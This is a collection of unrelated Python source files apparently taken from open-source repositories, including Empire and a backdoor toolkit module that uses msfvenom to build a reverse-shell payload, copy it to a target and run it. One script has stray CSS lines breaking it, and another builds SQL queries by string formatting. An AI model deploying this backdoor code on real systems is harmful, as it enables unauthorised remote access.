script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
|
Hackplayers/Empire-mod-Hackplayers
|
lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py
|
Python
|
bsd-3-clause
| 4,131
|
from .helper import IntegrationHelper
class TestGitHubIterator(IntegrationHelper):
def test_resets_etag(self):
cassette_name = self.cassette_name('resets_etag')
with self.recorder.use_cassette(cassette_name):
users_iter = self.gh.iter_all_users(number=10)
assert users_iter.etag is None
next(users_iter) # Make the request
assert users_iter.etag is not None
users_iter.refresh()
assert users_iter.etag is None
|
adrianmoisey/github3.py
|
tests/integration/test_structs.py
|
Python
|
bsd-3-clause
| 505
|
from pyquery import PyQuery as pq
from nose.tools import eq_
import amo.tests
from translations import models, widgets
class TestWidget(amo.tests.TestCase):
def test_avoid_purified_translation(self):
# Even if we pass in a LinkifiedTranslation the widget switches to a
# normal Translation before rendering.
w = widgets.TransTextarea.widget()
link = models.LinkifiedTranslation(localized_string='<b>yum yum</b>',
locale='fr', id=10)
link.clean()
widget = w.render('name', link)
eq_(pq(widget).html(), '<b>yum yum</b>')
def test_default_locale(self):
w = widgets.TransTextarea()
result = w.render('name', '')
eq_(pq(result)('textarea:not([lang=init])').attr('lang'), 'en-us')
w.default_locale = 'pl'
result = w.render('name', '')
eq_(pq(result)('textarea:not([lang=init])').attr('lang'), 'pl')
|
Joergen/zamboni
|
apps/translations/tests/test_widgets.py
|
Python
|
bsd-3-clause
| 954
|
#
# Readout.py -- Readout for displaying image cursor information
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga.gw import Widgets
from ginga.misc import Bunch
class Readout(object):
def __init__(self, width, height):
readout = Widgets.Label('', halign='center', style='clickable')
#readout.resize(width, height)
readout.set_color(bg="#202030", fg="lightgreen")
self.readout = readout
self.maxx = 0
self.maxy = 0
self.maxv = 0
self.fitsimage = None
def get_widget(self):
return self.readout
def set_font(self, font):
self.readout.set_font(font)
def set_text(self, text):
self.readout.set_text(text)
# END
|
rajul/ginga
|
ginga/gw/Readout.py
|
Python
|
bsd-3-clause
| 883
|
#!/usr/bin/python
#
# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2015 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import json
import struct
import re
import base64
import httplib
import sys
settings = {}
class PepeCoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblock(self, hash, verbose=True):
return self.rpc('getblock', [hash, verbose])
def getblockhash(self, index):
return self.rpc('getblockhash', [index])
def get_block_hashes(settings):
rpc = PepeCoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpassword'])
for height in xrange(settings['min_height'], settings['max_height']+1):
hash = rpc.getblockhash(height)
print(hash)
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: linearize-hashes.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 31500
background-color: rgb(0, 0, 0);
alternate-background-color: rgb(86, 0, 120);
if 'min_height' not in settings:
settings['min_height'] = 0
if 'max_height' not in settings:
settings['max_height'] = 319000
if 'rpcuser' not in settings or 'rpcpassword' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['min_height'] = int(settings['min_height'])
settings['max_height'] = int(settings['max_height'])
get_block_hashes(settings)
|
cyberpepe/pepecoin-core
|
src/contrib/linearize/linearize-hashes.py
|
Python
|
mit
| 2,846
|
from launch_params import LaunchParamsMixin
from request_validator import (
RequestValidatorMixin,
FlaskRequestValidatorMixin,
DjangoRequestValidatorMixin,
WebObRequestValidatorMixin
)
from outcome_request import OutcomeRequest
from collections import defaultdict
import re
from urllib import urlencode
from urlparse import urlsplit, urlunsplit
try:
from urlparse import parse_qsl
except ImportError:
# fall back for Python 2.5
from cgi import parse_qsl # NOQA
accessors = [
'consumer_key',
'consumer_secret',
'outcome_requests',
'lti_errormsg',
'lti_errorlog',
'lti_msg',
'lti_log'
]
class ToolProvider(LaunchParamsMixin, RequestValidatorMixin, object):
'''
Implements the LTI Tool Provider.
'''
def __init__(self, consumer_key, consumer_secret, params={}):
'''
Create new ToolProvider.
'''
# Initialize all class accessors to None
for param in accessors:
setattr(self, param, None)
# These are hyper important class members that we init first
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
# Call superclass initializers
super(ToolProvider, self).__init__()
self.non_spec_params = defaultdict(lambda: None)
self.outcome_requests = []
self.params = params
self.process_params(params)
def has_role(self, role):
'''
Check whether the Launch Paramters set the role.
'''
return self.roles and any([re.search(role, our_role, re.I)
for our_role in self.roles])
def is_student(self):
'''
Convenience method for checking if the user has 'learner' or 'student'
role.
'''
return any((self.has_role('learner'),
self.has_role('student')))
def is_instructor(self):
'''
Convenience method for checking if user has 'instructor', 'faculty'
or 'staff' role.
Currently this does not support the TeachingAssistant role
'''
return any((self.has_role('instructor'),
self.has_role('faculty'),
self.has_role('staff')))
def is_launch_request(self):
'''
Check if the request was an LTI Launch Request.
'''
return self.lti_message_type == 'basic-lti-launch-request'
def is_outcome_service(self):
'''
Check if the Tool Launch expects an Outcome Result.
'''
return (self.lis_outcome_service_url and
self.lis_result_sourcedid)
def username(self, default=None):
'''
Return the full, given, or family name if set.
'''
if self.lis_person_name_given:
return self.lis_person_name_given
elif self.lis_person_name_family:
return self.lis_person_name_family
elif self.lis_person_name_full:
return self.lis_person_name_full
else:
return default
def post_replace_result(self, score, outcome_opts=defaultdict(lambda:None), result_data=None):
'''
POSTs the given score to the Tool Consumer with a replaceResult.
Returns OutcomeResponse object and stores it in self.outcome_request
OPTIONAL:
result_data must be a dictionary
Note: ONLY ONE of these values can be in the dict at a time,
due to the Canvas specification.
'text' : str text
'url' : str url
'''
return self.new_request(outcome_opts).post_replace_result(score, result_data)
def post_delete_result(self,outcome_opts=defaultdict(lambda:None)):
'''
POSTs a delete request to the Tool Consumer.
'''
return self.new_request(outcome_opts).post_delete_result()
def post_read_result(self,outcome_opts=defaultdict(lambda:None)):
'''
POSTs the given score to the Tool Consumer with a replaceResult, the
returned OutcomeResponse will have the score.
'''
return self.new_request(outcome_opts).post_read_result()
def last_outcome_request(self):
'''
Returns the most recent OutcomeRequest.
'''
return self.outcome_requests[-1]
def last_outcome_success(self):
'''
Convenience method for determining the success of the last
OutcomeRequest.
'''
return all((self.last_outcome_request,
self.last_outcome_request.was_outcome_post_successful()))
def build_return_url(self):
'''
If the Tool Consumer sent a return URL, add any set messages to the
URL.
'''
if not self.launch_presentation_return_url:
return None
lti_message_fields = ['lti_errormsg', 'lti_errorlog',
'lti_msg', 'lti_log']
messages = dict([(key, getattr(self, key))
for key in lti_message_fields
if getattr(self, key, None)])
# Disassemble original return URL and reassemble with our options added
original = urlsplit(self.launch_presentation_return_url)
combined = messages.copy()
combined.update(dict(parse_qsl(original.query)))
combined_query = urlencode(combined)
return urlunsplit((
original.scheme,
original.netloc,
original.path,
combined_query,
original.fragment
))
def new_request(self, defaults):
opts = dict(defaults)
opts.update({
'consumer_key': self.consumer_key,
'consumer_secret': self.consumer_secret,
'lis_outcome_service_url': self.lis_outcome_service_url,
'lis_result_sourcedid': self.lis_result_sourcedid
})
self.outcome_requests.append(OutcomeRequest(opts=opts))
self.last_outcome_request = self.outcome_requests[-1]
return self.last_outcome_request
class DjangoToolProvider(DjangoRequestValidatorMixin, ToolProvider):
'''
OAuth ToolProvider that works with Django requests
'''
def success_redirect(self, msg='', log=''):
'''
Shortcut for redirecting Django view to LTI Consumer with messages
'''
from django.shortcuts import redirect
self.lti_msg = msg
self.lti_log = log
return redirect(self.build_return_url())
def error_redirect(self, errormsg='', errorlog=''):
'''
Shortcut for redirecting Django view to LTI Consumer with errors
'''
from django.shortcuts import redirect
self.lti_errormsg = errormsg
self.lti_errorlog = errorlog
return redirect(self.build_return_url())
class FlaskToolProvider(FlaskRequestValidatorMixin, ToolProvider):
'''
OAuth ToolProvider that works with Flask requests
'''
pass
class WebObToolProvider(WebObRequestValidatorMixin, ToolProvider):
"""
OAuth Tool Provider that works with WebOb requests.
"""
pass
|
tophatmonocle/ims_lti_py
|
ims_lti_py/tool_provider.py
|
Python
|
mit
| 7,132
|
import cupy
# TODO(okuta): Implement asfarray
def asfortranarray(a, dtype=None):
"""Return an array laid out in Fortran order in memory.
Args:
a (~cupy.ndarray): The input array.
dtype (str or dtype object, optional): By default, the data-type is
inferred from the input data.
Returns:
~cupy.ndarray: The input `a` in Fortran, or column-major, order.
.. seealso:: :func:`numpy.asfortranarray`
"""
ret = cupy.empty(a.shape[::-1], a.dtype if dtype is None else dtype).T
ret[...] = a
return ret
# TODO(okuta): Implement asarray_chkfinite
# TODO(okuta): Implement asscalar
# TODO(okuta): Implement require
|
cemoody/chainer
|
cupy/manipulation/kind.py
|
Python
|
mit
| 684
|
"""This file defines MIDI standard constants, which are useful for converting
between numeric MIDI data values and human-readable text.
"""
# INSTRUMENT_MAP[program_number] maps the program_number to an instrument name
INSTRUMENT_MAP = ['Acoustic Grand Piano', 'Bright Acoustic Piano',
'Electric Grand Piano', 'Honky-tonk Piano',
'Electric Piano 1', 'Electric Piano 2', 'Harpsichord',
'Clavinet', 'Celesta', 'Glockenspiel', 'Music Box',
'Vibraphone', 'Marimba', 'Xylophone', 'Tubular Bells',
'Dulcimer', 'Drawbar Organ', 'Percussive Organ',
'Rock Organ', 'Church Organ', 'Reed Organ', 'Accordion',
'Harmonica', 'Tango Accordion', 'Acoustic Guitar (nylon)',
'Acoustic Guitar (steel)', 'Electric Guitar (jazz)',
'Electric Guitar (clean)', 'Electric Guitar (muted)',
'Overdriven Guitar', 'Distortion Guitar',
'Guitar Harmonics', 'Acoustic Bass',
'Electric Bass (finger)', 'Electric Bass (pick)',
'Fretless Bass', 'Slap Bass 1', 'Slap Bass 2',
'Synth Bass 1', 'Synth Bass 2', 'Violin', 'Viola', 'Cello',
'Contrabass', 'Tremolo Strings', 'Pizzicato Strings',
'Orchestral Harp', 'Timpani', 'String Ensemble 1',
'String Ensemble 2', 'Synth Strings 1', 'Synth Strings 2',
'Choir Aahs', 'Voice Oohs', 'Synth Choir', 'Orchestra Hit',
'Trumpet', 'Trombone', 'Tuba', 'Muted Trumpet',
'French Horn', 'Brass Section', 'Synth Brass 1',
'Synth Brass 2', 'Soprano Sax', 'Alto Sax', 'Tenor Sax',
'Baritone Sax', 'Oboe', 'English Horn', 'Bassoon',
'Clarinet', 'Piccolo', 'Flute', 'Recorder', 'Pan Flute',
'Blown bottle', 'Shakuhachi', 'Whistle', 'Ocarina',
'Lead 1 (square)', 'Lead 2 (sawtooth)',
'Lead 3 (calliope)', 'Lead 4 chiff', 'Lead 5 (charang)',
'Lead 6 (voice)', 'Lead 7 (fifths)',
'Lead 8 (bass + lead)', 'Pad 1 (new age)', 'Pad 2 (warm)',
'Pad 3 (polysynth)', 'Pad 4 (choir)', 'Pad 5 (bowed)',
'Pad 6 (metallic)', 'Pad 7 (halo)', 'Pad 8 (sweep)',
'FX 1 (rain)', 'FX 2 (soundtrack)', 'FX 3 (crystal)',
'FX 4 (atmosphere)', 'FX 5 (brightness)', 'FX 6 (goblins)',
'FX 7 (echoes)', 'FX 8 (sci-fi)', 'Sitar', 'Banjo',
'Shamisen', 'Koto', 'Kalimba', 'Bagpipe', 'Fiddle',
'Shanai', 'Tinkle Bell', 'Agogo', 'Steel Drums',
'Woodblock', 'Taiko Drum', 'Melodic Tom', 'Synth Drum',
'Reverse Cymbal', 'Guitar Fret Noise', 'Breath Noise',
'Seashore', 'Bird Tweet', 'Telephone Ring', 'Helicopter',
'Applause', 'Gunshot']
# INSTRUMENT_CLASSES contains the classes present in INSTRUMENTS
INSTRUMENT_CLASSES = ['Piano', 'Chromatic Percussion', 'Organ', 'Guitar',
'Bass', 'Strings', 'Ensemble', 'Brass', 'Reed', 'Pipe',
'Synth Lead', 'Synth Pad', 'Synth Effects', 'Ethnic',
'Percussive',
'Sound Effects']
# List which maps MIDI note number - 35 to drum name
# from http://www.midi.org/techspecs/gm1sound.php
DRUM_MAP = ['Acoustic Bass Drum', 'Bass Drum 1', 'Side Stick',
'Acoustic Snare', 'Hand Clap', 'Electric Snare',
'Low Floor Tom', 'Closed Hi Hat', 'High Floor Tom',
'Pedal Hi Hat', 'Low Tom', 'Open Hi Hat',
'Low-Mid Tom', 'Hi-Mid Tom', 'Crash Cymbal 1',
'High Tom', 'Ride Cymbal 1', 'Chinese Cymbal',
'Ride Bell', 'Tambourine', 'Splash Cymbal',
'Cowbell', 'Crash Cymbal 2', 'Vibraslap',
'Ride Cymbal 2', 'Hi Bongo', 'Low Bongo',
'Mute Hi Conga', 'Open Hi Conga', 'Low Conga',
'High Timbale', 'Low Timbale', 'High Agogo',
'Low Agogo', 'Cabasa', 'Maracas',
'Short Whistle', 'Long Whistle', 'Short Guiro',
'Long Guiro', 'Claves', 'Hi Wood Block',
'Low Wood Block', 'Mute Cuica', 'Open Cuica',
'Mute Triangle', 'Open Triangle']
|
douglaseck/pretty-midi
|
pretty_midi/constants.py
|
Python
|
mit
| 4,378
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : Victor Lin
# E-mail : linxianwusx@gmail.com
# Date : 15/02/04 19:59:23
#
import sae
import tornado.web
import shortuuid
import datetime
import time
import MySQLdb
import base64
applyTime = 30
def checkClientId(secureclientId):
try:
cryptenStr = base64.b64decode(secureclientId)
if cryptenStr[0] == 'a' and cryptenStr[7] == '3' and cryptenStr[-3] == '3' and cryptenStr[-1] == '0':
return True
else:
return False
except:
return False
def getUuid():
return shortuuid.ShortUUID().random(length=22)
def selectFreeqcFromClientId(clientId):
conn = MySQLdb.connect(host=sae.const.MYSQL_HOST,user=sae.const.MYSQL_USER,passwd=sae.const.MYSQL_PASS,db=sae.const.MYSQL_DB,port=int(sae.const.MYSQL_PORT),charset='utf8')
cursor = conn.cursor()
cursor.execute("select * from freeqc where ClientId='%s'" % clientId)
result = cursor.fetchone()
cursor.close()
conn.close()
if result:
return result
else:
return -1
def selectQrcodeFromqrcode(qrcode):
conn = MySQLdb.connect(host=sae.const.MYSQL_HOST,user=sae.const.MYSQL_USER,passwd=sae.const.MYSQL_PASS,db=sae.const.MYSQL_DB,port=int(sae.const.MYSQL_PORT),charset='utf8')
cursor = conn.cursor()
cursor.execute("select * from qrcode where QrId='%s'" % qrcode)
result = cursor.fetchone()
cursor.close()
conn.close()
return result
def insertIntoFreeqc(clientId):
conn=MySQLdb.connect(host=sae.const.MYSQL_HOST,user=sae.const.MYSQL_USER,passwd=sae.const.MYSQL_PASS,db=sae.const.MYSQL_DB,port=int(sae.const.MYSQL_PORT),charset='utf8')
cursor = conn.cursor()
uuid = getUuid()
dtn = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
if selectFreeqcFromClientId(clientId) == -1:
# 从未注册过 要insert
cursor.execute("insert into freeqc (ClientId,Qrcode,ApplyTime) values (%s,%s,%s)",(clientId, uuid, dtn))
else:
# 注册过,要update
cursor.execute("update freeqc set Qrcode = %s where ClientId = %s",(uuid, clientId))
cursor.execute("update freeqc set Qrcode = %s where ApplyTime = %s",(uuid, dtn))
cursor.execute("insert into qrcode (QrId) values (%s)",(uuid,))
conn.commit()
cursor.close()
conn.close()
return uuid
class FreeQc(tornado.web.RequestHandler):
def post(self):
global applyTime
clientId = self.get_argument('Id')
print "ID ----> ", clientId
if checkClientId(clientId):
self.clientId = clientId
ci = selectFreeqcFromClientId(self.clientId)
if ci == -1:
# 从未申请过二维码
self.qrcode = insertIntoFreeqc(self.clientId)
print self.qrcode
self.write('{"status" : "blank" , ' +
'"code" : "' + self.qrcode + '"}')
else: #申请过二维码
self.qrcode, self.applyTime = ci[2], ci[3]
ct = selectQrcodeFromqrcode(self.qrcode)
self.data = ct[2]
print "data '" + self.data + "'"
if (self.data): # 已使用
now = datetime.datetime.now()
used = datetime.datetime.strptime(self.applyTime,"%Y-%m-%d %H:%M:%S")
usedMinutes = (now - used).seconds
if usedMinutes >= (applyTime * 60):
# todo 二维码过期
self.qrcode = insertIntoFreeqc(self.clientId)
print self.qrcode
self.write('{"status" : "blank" , ' +
'"code" : "' + self.qrcode + '"}')
else:
self.write('{"status" : "used"}')
else: # 二维码未使用
self.qrcode = insertIntoFreeqc(self.clientId)
print self.qrcode
self.write('{"status" : "blank" , ' +
'"code" : "' + self.qrcode + '"}')
else:
self.write('{"status" : "error"}')
|
XianwuLin/vscan
|
server/linxianwu/1/handler/FreeQc.py
|
Python
|
mit
| 4,195
|
# -*- coding: utf-8 -*-
"""
=================================
Wasserstein Discriminant Analysis
=================================
This example illustrate the use of WDA as proposed in [11].
[11] Flamary, R., Cuturi, M., Courty, N., & Rakotomamonjy, A. (2016).
Wasserstein Discriminant Analysis.
"""
# Author: Remi Flamary <remi.flamary@unice.fr>
#
# License: MIT License
import numpy as np
import matplotlib.pylab as pl
from ot.dr import wda, fda
##############################################################################
# Generate data
# -------------
#%% parameters
n = 1000 # nb samples in source and target datasets
nz = 0.2
# generate circle dataset
t = np.random.rand(n) * 2 * np.pi
ys = np.floor((np.arange(n) * 1.0 / n * 3)) + 1
xs = np.concatenate(
(np.cos(t).reshape((-1, 1)), np.sin(t).reshape((-1, 1))), 1)
xs = xs * ys.reshape(-1, 1) + nz * np.random.randn(n, 2)
t = np.random.rand(n) * 2 * np.pi
yt = np.floor((np.arange(n) * 1.0 / n * 3)) + 1
xt = np.concatenate(
(np.cos(t).reshape((-1, 1)), np.sin(t).reshape((-1, 1))), 1)
xt = xt * yt.reshape(-1, 1) + nz * np.random.randn(n, 2)
nbnoise = 8
xs = np.hstack((xs, np.random.randn(n, nbnoise)))
xt = np.hstack((xt, np.random.randn(n, nbnoise)))
##############################################################################
# Plot data
# ---------
#%% plot samples
pl.figure(1, figsize=(6.4, 3.5))
pl.subplot(1, 2, 1)
pl.scatter(xt[:, 0], xt[:, 1], c=ys, marker='+', label='Source samples')
pl.legend(loc=0)
pl.title('Discriminant dimensions')
pl.subplot(1, 2, 2)
pl.scatter(xt[:, 2], xt[:, 3], c=ys, marker='+', label='Source samples')
pl.legend(loc=0)
pl.title('Other dimensions')
pl.tight_layout()
##############################################################################
# Compute Fisher Discriminant Analysis
# ------------------------------------
#%% Compute FDA
p = 2
Pfda, projfda = fda(xs, ys, p)
##############################################################################
# Compute Wasserstein Discriminant Analysis
# -----------------------------------------
#%% Compute WDA
p = 2
reg = 1e0
k = 10
maxiter = 100
Pwda, projwda = wda(xs, ys, p, reg, k, maxiter=maxiter)
##############################################################################
# Plot 2D projections
# -------------------
#%% plot samples
xsp = projfda(xs)
xtp = projfda(xt)
xspw = projwda(xs)
xtpw = projwda(xt)
pl.figure(2)
pl.subplot(2, 2, 1)
pl.scatter(xsp[:, 0], xsp[:, 1], c=ys, marker='+', label='Projected samples')
pl.legend(loc=0)
pl.title('Projected training samples FDA')
pl.subplot(2, 2, 2)
pl.scatter(xtp[:, 0], xtp[:, 1], c=ys, marker='+', label='Projected samples')
pl.legend(loc=0)
pl.title('Projected test samples FDA')
pl.subplot(2, 2, 3)
pl.scatter(xspw[:, 0], xspw[:, 1], c=ys, marker='+', label='Projected samples')
pl.legend(loc=0)
pl.title('Projected training samples WDA')
pl.subplot(2, 2, 4)
pl.scatter(xtpw[:, 0], xtpw[:, 1], c=ys, marker='+', label='Projected samples')
pl.legend(loc=0)
pl.title('Projected test samples WDA')
pl.tight_layout()
pl.show()
|
aje/POT
|
examples/plot_WDA.py
|
Python
|
mit
| 3,084
|
from backdoor import *
import os
class Windows(Backdoor):
prompt = Fore.RED + "(windows) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Windows module..."
self.core = core
self.options = {
"port" : Option("port", 53932, "port to connect to", True),
"name" : Option("name", "back.exe", "name of new backdoor", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + " Creates and starts a metasploit reverse_tcp backdoor."
def get_command(self):
return self.get_value("name")
def do_exploit(self, args):
os.system("msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=" + self.core.localIP + " LPORT=" + str(self.get_value("port")) + " -b \"\\x00\" -e x86/shikata_ga_nai -f exe -o " + self.get_value("name"))
print(GOOD + "Making the backdoor.")
self.core.curtarget.scpFiles(self, self.get_value("name"), False)
print(GOOD + "Moving the backdoor.")
print("Please enter the following commands: ")
print("msfconsole")
print("use exploit/multi/handler")
print("set payload windows/shell/reverse_tcp")
print("set LPORT " + str(self.get_value("port")))
print("set LHOST " + str(self.core.localIP))
raw_input("exploit")
self.core.curtarget.ssh.exec_command(str(self.get_command))
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
krintoxi/NoobSec-Toolkit
|
NoobSecToolkit /scripts/sshbackdoors/backdoors/windows/windows.py
|
Python
|
gpl-2.0
| 1,540
|
# Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import struct, socket
import volatility.debug as debug
import volatility.obj as obj
import volatility.utils as utils
import volatility.plugins.linux.common as linux_common
import volatility.plugins.malware.malfind as malfind
try:
import yara
has_yara = True
except ImportError:
has_yara = False
class linux_netscan(linux_common.AbstractLinuxCommand):
"""Carves for network connection structures"""
def check_socket_back_pointer(self, i):
return i.sk == i.sk.sk_socket.sk or i.sk.sk_socket.v() == 0x0
def check_pointers(self, i):
ret = self.addr_space.profile.get_symbol_by_address("kernel", i.sk.sk_backlog_rcv.v()) != None
if ret:
ret = self.addr_space.profile.get_symbol_by_address("kernel", i.sk.sk_error_report.v()) != None
return ret
def check_proto(self, i):
return i.protocol in ("TCP", "UDP", "IP")
def check_family(self, i):
return i.sk.__sk_common.skc_family in (socket.AF_INET, socket.AF_INET6) #pylint: disable-msg=W0212
def calculate(self):
if not has_yara:
debug.error("Please install Yara from https://plusvic.github.io/yara/")
linux_common.set_plugin_members(self)
## the start of kernel memory taken from VolatilityLinuxIntelValidAS
if self.addr_space.profile.metadata.get('memory_model', '32bit') == "32bit":
kernel_start = 0xc0000000
pack_size = 4
pack_fmt = "<I"
else:
kernel_start = 0xffffffff80000000
pack_size = 8
pack_fmt = "<Q"
checks = [self.check_family, self.check_proto, self.check_socket_back_pointer, self.check_pointers]
destruct_offset = self.addr_space.profile.get_obj_offset("sock", "sk_destruct")
# sk_destruct pointer value of sock
func_addr = self.addr_space.profile.get_symbol("inet_sock_destruct")
vals = []
# convert address into a yara hex rule
for bit in range(pack_size):
idx = (pack_size - bit - 1) * 8
mask = 0xff << idx
val = ((func_addr & mask) >> idx) & 0xff
vals.insert(0, val)
s = "{" + " ".join(["%.02x" % v for v in vals]) + " }"
rules = yara.compile(sources = { 'n' : 'rule r1 {strings: $a = ' + s + ' condition: $a}' })
scanner = malfind.DiscontigYaraScanner(rules = rules, address_space = self.addr_space)
for _, address in scanner.scan(start_offset = kernel_start):
base_address = address - destruct_offset
i = obj.Object("inet_sock", offset = base_address, vm = self.addr_space)
valid = True
for check in checks:
if check(i) == False:
valid = False
break
if valid:
state = i.state if i.protocol == "TCP" else ""
family = i.sk.__sk_common.skc_family #pylint: disable-msg=W0212
sport = i.src_port
dport = i.dst_port
saddr = i.src_addr
daddr = i.dst_addr
yield (i, i.protocol, saddr, sport, daddr, dport, state)
def render_text(self, outfd, data):
for (_, proto, saddr, sport, daddr, dport, state) in data:
outfd.write("{0:8s} {1:<16}:{2:>5} {3:<16}:{4:>5} {5:<15s}\n".format(proto, saddr, sport, daddr, dport, state))
|
fengxiaoiie/volatility
|
volatility/plugins/linux/netscan.py
|
Python
|
gpl-2.0
| 4,373
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id$
"""
VirtualBox Validation Kit - CGI - Log out page.
"""
__copyright__ = \
"""
Copyright (C) 2012-2014 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
The contents of this file may alternatively be used under the terms
of the Common Development and Distribution License Version 1.0
(CDDL) only, as it comes in the "COPYING.CDDL" file of the
VirtualBox OSE distribution, in which case the provisions of the
CDDL are applicable instead of those of the GPL.
You may elect to license modified versions of this file under the
terms and conditions of either the GPL or the CDDL or both.
"""
__version__ = "$Revision$"
# Standard python imports.
import os
import sys
# Only the main script needs to modify the path.
g_ksValidationKitDir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))));
sys.path.append(g_ksValidationKitDir);
# Validation Kit imports.
from testmanager.core.webservergluecgi import WebServerGlueCgi
def main():
"""
Main function a la C/C++. Returns exit code.
"""
oSrvGlue = WebServerGlueCgi(g_ksValidationKitDir, fHtmlOutput = True)
sUser = oSrvGlue.getLoginName()
if sUser != oSrvGlue.ksUnknownUser and sUser != 'logout':
oSrvGlue.write('<p>Broken apache config!\n'
'The logout.py script should be configured with .htaccess-logout and require user logout!</p>')
else:
oSrvGlue.write('<p>Successfully logged out!</p>')
oSrvGlue.write('<p><a href="%sadmin.py">Log in</a> under another user name.</p>' %
(oSrvGlue.getBaseUrl(),))
oSrvGlue.write('<hr/><p>debug info:</p>')
oSrvGlue.debugInfoPage()
oSrvGlue.flush()
return 0
if __name__ == '__main__':
sys.exit(main())
|
svn2github/vbox
|
src/VBox/ValidationKit/testmanager/cgi/logout.py
|
Python
|
gpl-2.0
| 2,233
|
from .csv import CSVCommPlugin
from .ros import ROSCommPlugin
plugin_map = {
"csv": CSVCommPlugin,
"csv_comm": CSVCommPlugin,
"ros": ROSCommPlugin,
"ros_comm": ROSCommPlugin
}
|
davoclavo/openag_brain
|
src/openag_lib/firmware/plugins/__init__.py
|
Python
|
gpl-3.0
| 193
|
import os
BASEDIR = os.path.abspath(os.path.dirname(__file__))
# If BASE is https these has to be specified
SERVER_CERT = "%s/certificates/server.crt" % BASEDIR
SERVER_KEY = "%s/certificates/server.key" % BASEDIR
#CERT_CHAIN = None
CA_BUNDLE = None
VERIFY_SSL = False
|
mokemokechicken/oictest_docker
|
example/etc/rp/sslconf.py
|
Python
|
gpl-3.0
| 271
|
#!/usr/bin/env python
########################################################################
# File : dirac-start-mysql
# Author : Ricardo Graciani
########################################################################
"""
Start DIRAC MySQL server
"""
__RCSID__ = "$Id$"
#
from DIRAC.Core.Base import Script
Script.disableCS()
Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
'Usage:',
' %s [option|cfgfile] ...' % Script.scriptName,
] ) )
Script.parseCommandLine()
#
from DIRAC.FrameworkSystem.Client.ComponentInstaller import gComponentInstaller
#
gComponentInstaller.exitOnError = True
#
print gComponentInstaller.startMySQL()['Value'][1]
|
Andrew-McNab-UK/DIRAC
|
Core/scripts/dirac-start-mysql.py
|
Python
|
gpl-3.0
| 776
|
"""A contents manager that uses the local file system for storage."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import io
import os
import shutil
import mimetypes
from tornado import web
from .filecheckpoints import FileCheckpoints
from .fileio import FileManagerMixin
from .manager import ContentsManager
from IPython import nbformat
from IPython.utils.importstring import import_item
from IPython.utils.traitlets import Any, Unicode, Bool, TraitError
from IPython.utils.py3compat import getcwd, string_types
from IPython.utils import tz
from IPython.html.utils import (
is_hidden,
to_api_path,
)
_script_exporter = None
